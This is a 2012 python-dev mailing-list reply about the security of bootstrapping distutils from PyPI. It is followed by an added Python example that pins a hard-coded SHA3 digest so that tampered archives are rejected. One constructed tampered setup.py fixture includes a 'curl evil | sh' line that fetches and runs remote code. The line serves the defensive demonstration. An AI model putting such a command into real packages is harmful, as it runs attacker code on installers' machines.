On Tue, Nov 13, 2012 at 12:23 PM, "Martin v. Löwis" <martin@v.loewis.de> wrote:
> I want to remove distutils from the standard library. If that happens
> then we might want a secure way to install it from pypi. One way would
> be to include the public key used to sign distutils in Python's own
> signature-verifying bootstrap wheel installer, never mind whether it
> used ECDSA or RSA or Ed25519. Do you have a better idea? TUF?
> https://www.updateframework.com/wiki/SecuringPythonPackageManagement

It depends on the threat model - whose definition is key to any security
discussion.
I'd say that providing the CA certificate of the CA, and using https
for downloading, should be enough.
Alternatively, if the threat is that somebody may have hacked PyPI,
then hard-code the hash (SHA-3 if you are paranoid) in the Python
distribution, and rely on downloading a specific version from PyPI.
OTOH, I'm -1 on removing the code from Python in a way that it may
come back through downloading. Instead, it is much easier to keep
it included.
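The hard-coded-hash option Martin sketches above (pin the digest of one specific distutils release in the Python distribution, then accept only that archive from PyPI), as an added example that is not part of the thread and is not distutils or pip code. It assumes a hypothetical bootstrap installer whose `fetch()` callable stands in for the HTTPS download, uses constructed in-memory tar archives in place of real PyPI sdists, and picks SHA3-256 (in `hashlib` since Python 3.6) as the "paranoid" choice; `"sha256"` works identically. The signing-key/TUF alternative from the quoted text needs a third-party crypto library and is not shown.

```python
# Added example, not from the python-dev thread, distutils or pip.
# Demonstrates a bootstrap installer that trusts a digest hard-coded in the
# interpreter rather than the transport (HTTPS/CA) or the index (PyPI).
import hashlib
import hmac
import io
import tarfile


class VerificationError(Exception):
    """Raised when a downloaded archive does not match the pinned digest."""


def make_sdist(name, version, files):
    """Build a deterministic in-memory .tar source archive.

    Constructed sample data standing in for what PyPI would serve. Plain
    tar with mtime=0 so the digest is reproducible across runs.
    """
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for path, content in sorted(files.items()):
            data = content.encode()
            info = tarfile.TarInfo(f"{name}-{version}/{path}")
            info.size = len(data)
            info.mtime = 0
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def pin(data, alg="sha3_256"):
    """The record a Python release would hard-code: algorithm and digest of
    the single archive it is willing to install (hypothetical format)."""
    return {"alg": alg, "digest": hashlib.new(alg, data).hexdigest()}


def verify(data, pinned):
    """True iff `data` hashes to the pinned digest; constant-time compare."""
    actual = hashlib.new(pinned["alg"], data).hexdigest()
    return hmac.compare_digest(actual, pinned["digest"])


def bootstrap_install(fetch, pinned):
    """Download via fetch() (stand-in for the HTTPS client), refuse anything
    that is not byte-for-byte the pinned archive, then list its members.

    Verification happens before the archive is opened at all, so a tampered
    tarball never reaches the tar parser or the filesystem.
    """
    data = fetch()
    if not verify(data, pinned):
        actual = hashlib.new(pinned["alg"], data).hexdigest()
        raise VerificationError(f"{pinned['alg']} mismatch: got {actual}")
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tar:
        return [m.name for m in tar.getmembers()]


# Constructed scenarios: the release that was pinned, the same version as a
# "hacked PyPI" would serve it, and a later legitimate release.
GENUINE = make_sdist("distutils", "1.0", {
    "setup.py": "from distutils.core import setup\nsetup(name='distutils')\n",
    "distutils/__init__.py": "# genuine 1.0\n",
})
TAMPERED = make_sdist("distutils", "1.0", {
    "setup.py": "import os; os.system('curl evil | sh')  # injected\n",
    "distutils/__init__.py": "# genuine 1.0\n",
})
NEWER = make_sdist("distutils", "1.1", {
    "setup.py": "from distutils.core import setup\nsetup(name='distutils')\n",
    "distutils/__init__.py": "# genuine 1.1\n",
})
PINNED = pin(GENUINE)


def attempt(fetch, pinned=PINNED):
    """Run one install attempt and report the outcome instead of raising."""
    try:
        return ("installed", bootstrap_install(fetch, pinned))
    except VerificationError as exc:
        return ("rejected", str(exc))


def demo():
    """Outcome per scenario, keyed by name."""
    return {
        "genuine": attempt(lambda: GENUINE)[0],
        "tampered": attempt(lambda: TAMPERED)[0],
        "newer": attempt(lambda: NEWER)[0],
    }


if __name__ == "__main__":
    for scenario, outcome in demo().items():
        print(f"{scenario:8s} -> {outcome}")
```

Note what the third scenario shows: the pin protects against a compromised index or CA, but only for that one exact archive. A legitimate 1.1 is rejected just like the tampered 1.0, so shipping any update means cutting a new Python release with a new digest. That is the limitation the quoted message's signing-key and TUF options are meant to lift, at the cost of having to handle key compromise, rollback and expiry.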